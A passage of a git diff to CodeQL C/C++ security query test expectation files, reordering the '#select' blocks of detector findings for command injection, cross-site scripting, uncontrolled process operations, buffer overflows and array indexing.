derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | +| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | +| test.cpp:234:10:234:15 | buffer | test.cpp:231:19:231:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:231:19:231:33 | *call to getenv | user input (an environment variable) | test.cpp:231:11:231:16 | strncat output argument | strncat output argument | +| test.cpp:234:10:234:15 | buffer | test.cpp:232:19:232:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:232:19:232:33 | *call to getenv | user input (an environment variable) | test.cpp:232:11:232:16 | strncat output argument | strncat output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:243:5:243:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:243:5:243:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:242:11:242:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:248:5:248:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:248:5:248:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:261:10:261:15 | buffer | test.cpp:259:21:259:35 | *call to getenv | test.cpp:261:10:261:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:259:21:259:35 | *call to getenv | user input (an environment variable) | test.cpp:259:13:259:18 | strncat output argument | strncat output argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected index be2a5f70bccd..4f31dd3e17bf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected @@ -1,7 +1,3 @@ -#select -| search.c:17:8:17:12 | *query | search.c:67:21:67:26 | *call to getenv | search.c:17:8:17:12 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | -| search.c:23:39:23:43 | *query | search.c:67:21:67:26 | *call to getenv | search.c:23:39:23:43 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | -| search.c:62:8:62:17 | *query_text | search.c:67:21:67:26 | *call to getenv | search.c:62:8:62:17 | *query_text | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | edges | search.c:14:24:14:28 | *query | search.c:17:8:17:12 | *query | provenance | | | search.c:22:24:22:28 | *query | search.c:23:39:23:43 | *query | provenance | | @@ -26,3 +22,7 @@ nodes | search.c:73:17:73:25 | *raw_query | semmle.label | *raw_query | | search.c:77:17:77:25 | *raw_query | semmle.label | *raw_query | subpaths +#select +| search.c:17:8:17:12 | *query | search.c:67:21:67:26 | *call to getenv | search.c:17:8:17:12 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | +| search.c:23:39:23:43 | *query | search.c:67:21:67:26 | *call to getenv | search.c:23:39:23:43 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | +| search.c:62:8:62:17 | *query_text | search.c:67:21:67:26 | *call to getenv | search.c:62:8:62:17 | *query_text | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected index 999c7f5240df..f328113106e4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected @@ -1,5 +1,3 @@ -#select -| test.cpp:43:32:43:35 | *data | test.cpp:64:30:64:35 | *call to getenv | test.cpp:43:32:43:35 | *data | The value of this argument may come from $@ and is being passed to LoadLibraryA. | test.cpp:64:30:64:35 | *call to getenv | an environment variable | edges | test.cpp:37:73:37:76 | *data | test.cpp:43:32:43:35 | *data | provenance | | | test.cpp:64:30:64:35 | *call to getenv | test.cpp:64:30:64:35 | *call to getenv | provenance | | @@ -12,3 +10,5 @@ nodes | test.cpp:64:30:64:35 | *call to getenv | semmle.label | *call to getenv | | test.cpp:73:24:73:27 | *data | semmle.label | *data | subpaths +#select +| test.cpp:43:32:43:35 | *data | test.cpp:64:30:64:35 | *call to getenv | test.cpp:43:32:43:35 | *data | The value of this argument may come from $@ and is being passed to LoadLibraryA. | test.cpp:64:30:64:35 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected index c7cc621e4b3a..ca24075c2c34 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected @@ -1,14 +1,3 @@ -#select -| test.cpp:26:10:26:16 | *command | test.cpp:42:18:42:34 | *call to getenv | test.cpp:26:10:26:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:42:18:42:34 | *call to getenv | an environment variable | -| test.cpp:31:10:31:16 | *command | test.cpp:43:18:43:34 | *call to getenv | test.cpp:31:10:31:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:43:18:43:34 | *call to getenv | an environment variable | -| test.cpp:62:10:62:15 | *buffer | test.cpp:56:12:56:17 | fgets output argument | test.cpp:62:10:62:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:63:10:63:13 | *data | test.cpp:56:12:56:17 | fgets output argument | test.cpp:63:10:63:13 | *data | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:64:10:64:16 | *dataref | test.cpp:56:12:56:17 | fgets output argument | test.cpp:64:10:64:16 | *dataref | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:65:10:65:14 | *data2 | test.cpp:56:12:56:17 | fgets output argument | test.cpp:65:10:65:14 | *data2 | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:78:10:78:15 | *buffer | test.cpp:76:12:76:17 | fgets output argument | test.cpp:78:10:78:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:76:12:76:17 | fgets output argument | string read by fgets | -| test.cpp:99:15:99:20 | *buffer | test.cpp:98:17:98:22 | recv output argument | test.cpp:99:15:99:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:98:17:98:22 | recv output argument | buffer read by recv | -| test.cpp:107:15:107:20 | *buffer | test.cpp:106:17:106:22 | recv output argument | test.cpp:107:15:107:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:106:17:106:22 | recv output argument | buffer read by recv | -| test.cpp:114:9:114:11 | *ptr | test.cpp:113:8:113:12 | *call to fgets | test.cpp:114:9:114:11 | *ptr | The value of this argument may come from $@ and is being passed to system. | test.cpp:113:8:113:12 | *call to fgets | string read by fgets | edges | test.cpp:24:30:24:36 | *command | test.cpp:26:10:26:16 | *command | provenance | | | test.cpp:29:30:29:36 | *command | test.cpp:31:10:31:16 | *command | provenance | | @@ -51,3 +40,14 @@ nodes | test.cpp:113:8:113:12 | *call to fgets | semmle.label | *call to fgets | | test.cpp:114:9:114:11 | *ptr | semmle.label | *ptr | subpaths +#select +| test.cpp:26:10:26:16 | *command | test.cpp:42:18:42:34 | *call to getenv | test.cpp:26:10:26:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:42:18:42:34 | *call to getenv | an environment variable | +| test.cpp:31:10:31:16 | *command | test.cpp:43:18:43:34 | *call to getenv | test.cpp:31:10:31:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:43:18:43:34 | *call to getenv | an environment variable | +| test.cpp:62:10:62:15 | *buffer | test.cpp:56:12:56:17 | fgets output argument | test.cpp:62:10:62:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:63:10:63:13 | *data | test.cpp:56:12:56:17 | fgets output argument | test.cpp:63:10:63:13 | *data | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:64:10:64:16 | *dataref | test.cpp:56:12:56:17 | fgets output argument | test.cpp:64:10:64:16 | *dataref | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:65:10:65:14 | *data2 | test.cpp:56:12:56:17 | fgets output argument | test.cpp:65:10:65:14 | *data2 | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:78:10:78:15 | *buffer | test.cpp:76:12:76:17 | fgets output argument | test.cpp:78:10:78:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:76:12:76:17 | fgets output argument | string read by fgets | +| test.cpp:99:15:99:20 | *buffer | test.cpp:98:17:98:22 | recv output argument | test.cpp:99:15:99:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:98:17:98:22 | recv output argument | buffer read by recv | +| test.cpp:107:15:107:20 | *buffer | test.cpp:106:17:106:22 | recv output argument | test.cpp:107:15:107:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:106:17:106:22 | recv output argument | buffer read by recv | +| test.cpp:114:9:114:11 | *ptr | test.cpp:113:8:113:12 | *call to fgets | test.cpp:114:9:114:11 | *ptr | The value of this argument may come from $@ and is being passed to system. | test.cpp:113:8:113:12 | *call to fgets | string read by fgets | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected index b81401816205..3a2b7372831d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected @@ -1,19 +1,3 @@ -#select -| test.cpp:42:5:42:11 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:42:18:42:23 | string | This write may overflow $@ by 1 element. | test.cpp:42:18:42:23 | string | string | -| test.cpp:72:9:72:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:72:22:72:27 | string | This write may overflow $@ by 1 element. | test.cpp:72:22:72:27 | string | string | -| test.cpp:80:9:80:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:80:22:80:27 | string | This write may overflow $@ by 2 elements. | test.cpp:80:22:80:27 | string | string | -| test.cpp:152:5:152:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:152:18:152:23 | string | This write may overflow $@ by 1 element. | test.cpp:152:18:152:23 | string | string | -| test.cpp:154:5:154:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:154:18:154:23 | string | This write may overflow $@ by 1 element. | test.cpp:154:18:154:23 | string | string | -| test.cpp:156:5:156:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:156:18:156:23 | string | This write may overflow $@ by 2 elements. | test.cpp:156:18:156:23 | string | string | -| test.cpp:175:9:175:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:175:22:175:27 | string | This write may overflow $@ by 1 element. | test.cpp:175:22:175:27 | string | string | -| test.cpp:187:9:187:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:187:22:187:27 | string | This write may overflow $@ by 1 element. | test.cpp:187:22:187:27 | string | string | -| test.cpp:195:9:195:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:195:22:195:27 | string | This write may overflow $@ by 1 element. | test.cpp:195:22:195:27 | string | string | -| test.cpp:199:9:199:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:199:22:199:27 | string | This write may overflow $@ by 2 elements. | test.cpp:199:22:199:27 | string | string | -| test.cpp:203:9:203:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:203:22:203:27 | string | This write may overflow $@ by 2 elements. | test.cpp:203:22:203:27 | string | string | -| test.cpp:207:9:207:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:207:22:207:27 | string | This write may overflow $@ by 3 elements. | test.cpp:207:22:207:27 | string | string | -| test.cpp:243:5:243:10 | call to memset | test.cpp:241:20:241:38 | call to malloc | test.cpp:243:12:243:21 | string | This write may overflow $@ by 1 element. | test.cpp:243:16:243:21 | string | string | -| test.cpp:250:5:250:10 | call to memset | test.cpp:249:14:249:33 | call to my_alloc | test.cpp:250:12:250:12 | p | This write may overflow $@ by 1 element. | test.cpp:250:12:250:12 | p | p | -| test.cpp:266:5:266:10 | call to memset | test.cpp:262:15:262:30 | call to malloc | test.cpp:266:12:266:12 | p | This write may overflow $@ by 1 element. | test.cpp:266:12:266:12 | p | p | edges | test.cpp:16:11:16:21 | **mk_string_t [string] | test.cpp:39:21:39:31 | *call to mk_string_t [string] | provenance | | | test.cpp:18:5:18:7 | *str [post update] [string] | test.cpp:19:5:19:7 | *str [string] | provenance | | @@ -124,3 +108,19 @@ nodes subpaths | test.cpp:242:22:242:27 | buffer | test.cpp:235:40:235:45 | buffer | test.cpp:235:27:235:31 | *p_str [Return] [string] | test.cpp:242:16:242:19 | set_string output argument [string] | | test.cpp:242:22:242:27 | buffer | test.cpp:235:40:235:45 | buffer | test.cpp:235:27:235:31 | *p_str [string] | test.cpp:242:16:242:19 | set_string output argument [string] | +#select +| test.cpp:42:5:42:11 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:42:18:42:23 | string | This write may overflow $@ by 1 element. | test.cpp:42:18:42:23 | string | string | +| test.cpp:72:9:72:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:72:22:72:27 | string | This write may overflow $@ by 1 element. | test.cpp:72:22:72:27 | string | string | +| test.cpp:80:9:80:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:80:22:80:27 | string | This write may overflow $@ by 2 elements. | test.cpp:80:22:80:27 | string | string | +| test.cpp:152:5:152:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:152:18:152:23 | string | This write may overflow $@ by 1 element. | test.cpp:152:18:152:23 | string | string | +| test.cpp:154:5:154:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:154:18:154:23 | string | This write may overflow $@ by 1 element. | test.cpp:154:18:154:23 | string | string | +| test.cpp:156:5:156:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:156:18:156:23 | string | This write may overflow $@ by 2 elements. | test.cpp:156:18:156:23 | string | string | +| test.cpp:175:9:175:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:175:22:175:27 | string | This write may overflow $@ by 1 element. | test.cpp:175:22:175:27 | string | string | +| test.cpp:187:9:187:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:187:22:187:27 | string | This write may overflow $@ by 1 element. | test.cpp:187:22:187:27 | string | string | +| test.cpp:195:9:195:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:195:22:195:27 | string | This write may overflow $@ by 1 element. | test.cpp:195:22:195:27 | string | string | +| test.cpp:199:9:199:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:199:22:199:27 | string | This write may overflow $@ by 2 elements. | test.cpp:199:22:199:27 | string | string | +| test.cpp:203:9:203:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:203:22:203:27 | string | This write may overflow $@ by 2 elements. | test.cpp:203:22:203:27 | string | string | +| test.cpp:207:9:207:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:207:22:207:27 | string | This write may overflow $@ by 3 elements. | test.cpp:207:22:207:27 | string | string | +| test.cpp:243:5:243:10 | call to memset | test.cpp:241:20:241:38 | call to malloc | test.cpp:243:12:243:21 | string | This write may overflow $@ by 1 element. | test.cpp:243:16:243:21 | string | string | +| test.cpp:250:5:250:10 | call to memset | test.cpp:249:14:249:33 | call to my_alloc | test.cpp:250:12:250:12 | p | This write may overflow $@ by 1 element. | test.cpp:250:12:250:12 | p | p | +| test.cpp:266:5:266:10 | call to memset | test.cpp:262:15:262:30 | call to malloc | test.cpp:266:12:266:12 | p | This write may overflow $@ by 1 element. | test.cpp:266:12:266:12 | p | p | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected index 142a9b4c59e5..d91379737073 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected @@ -1,8 +1,3 @@ -#select -| overflowdestination.cpp:30:2:30:8 | call to strncpy | main.cpp:6:27:6:30 | **argv | overflowdestination.cpp:30:17:30:20 | *arg1 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:46:2:46:7 | call to memcpy | overflowdestination.cpp:43:8:43:10 | fgets output argument | overflowdestination.cpp:46:15:46:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:53:2:53:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:53:15:53:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:64:2:64:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:64:16:64:19 | *src2 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | edges | main.cpp:6:27:6:30 | **argv | main.cpp:7:33:7:36 | **argv | provenance | | | main.cpp:7:33:7:36 | **argv | overflowdestination.cpp:23:45:23:48 | **argv | provenance | | @@ -39,3 +34,8 @@ nodes | overflowdestination.cpp:76:30:76:32 | *src | semmle.label | *src | subpaths | overflowdestination.cpp:75:30:75:32 | *src | overflowdestination.cpp:50:52:50:54 | *src | overflowdestination.cpp:50:52:50:54 | *src | overflowdestination.cpp:75:30:75:32 | overflowdest_test2 output argument | +#select +| overflowdestination.cpp:30:2:30:8 | call to strncpy | main.cpp:6:27:6:30 | **argv | overflowdestination.cpp:30:17:30:20 | *arg1 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:46:2:46:7 | call to memcpy | overflowdestination.cpp:43:8:43:10 | fgets output argument | overflowdestination.cpp:46:15:46:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:53:2:53:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:53:15:53:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:64:2:64:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:64:16:64:19 | *src2 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected index af3fa1ab7cf6..5c10f6e059d1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected @@ -1,6 +1,3 @@ -#select -| tests.cpp:636:2:636:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:636:17:636:22 | *source | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | -| tests.cpp:649:2:649:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:649:14:649:19 | *home | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | edges | main.cpp:6:27:6:30 | **argv | main.cpp:7:33:7:36 | **argv | provenance | | | main.cpp:6:27:6:30 | **argv | main.cpp:8:34:8:37 | **argv | provenance | | @@ -99,3 +96,6 @@ subpaths | main.cpp:8:34:8:37 | *argv | test_buffer_overrun.cpp:32:46:32:49 | *argv | test_buffer_overrun.cpp:32:46:32:49 | *argv | main.cpp:8:34:8:37 | test_buffer_overrun_main output argument | | main.cpp:9:29:9:32 | **argv | tests_restrict.c:15:41:15:44 | **argv | tests_restrict.c:15:41:15:44 | **argv | main.cpp:9:29:9:32 | tests_restrict_main output argument | | main.cpp:9:29:9:32 | *argv | tests_restrict.c:15:41:15:44 | *argv | tests_restrict.c:15:41:15:44 | *argv | main.cpp:9:29:9:32 | tests_restrict_main output argument | +#select +| tests.cpp:636:2:636:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:636:17:636:22 | *source | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | +| tests.cpp:649:2:649:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:649:14:649:19 | *home | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected index b4834cc6dc70..0ebcbb8cde4e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected @@ -1,9 +1,3 @@ -#select -| tests.c:28:3:28:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | -| tests.c:29:3:29:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | -| tests.c:31:15:31:23 | buffer100 | tests.c:31:15:31:23 | scanf output argument | tests.c:31:15:31:23 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:31:15:31:23 | scanf output argument | value read by scanf | -| tests.c:33:21:33:29 | buffer100 | tests.c:33:21:33:29 | scanf output argument | tests.c:33:21:33:29 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:33:21:33:29 | scanf output argument | value read by scanf | -| tests.c:34:25:34:33 | buffer100 | tests.c:16:26:16:29 | **argv | tests.c:34:10:34:16 | *access to array | This 'sscanf string argument' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | edges | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | provenance | | | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | provenance | | @@ -16,3 +10,9 @@ nodes | tests.c:33:21:33:29 | scanf output argument | semmle.label | scanf output argument | | tests.c:34:10:34:16 | *access to array | semmle.label | *access to array | subpaths +#select +| tests.c:28:3:28:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | +| tests.c:29:3:29:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | +| tests.c:31:15:31:23 | buffer100 | tests.c:31:15:31:23 | scanf output argument | tests.c:31:15:31:23 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:31:15:31:23 | scanf output argument | value read by scanf | +| tests.c:33:21:33:29 | buffer100 | tests.c:33:21:33:29 | scanf output argument | tests.c:33:21:33:29 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:33:21:33:29 | scanf output argument | value read by scanf | +| tests.c:34:25:34:33 | buffer100 | tests.c:16:26:16:29 | **argv | tests.c:34:10:34:16 | *access to array | This 'sscanf string argument' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected index 21a50d0a8fa1..1fb824b35d6e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected @@ -1,5 +1,3 @@ -#select -| CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | An array indexing expression depends on $@ that might be outside the bounds of the array. | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | string read by fgets | edges | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | provenance | TaintFunction | | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | provenance | | @@ -8,3 +6,5 @@ nodes | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | semmle.label | ... = ... | | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | semmle.label | data | subpaths +#select +| CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | An array indexing expression depends on $@ that might be outside the bounds of the array. | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 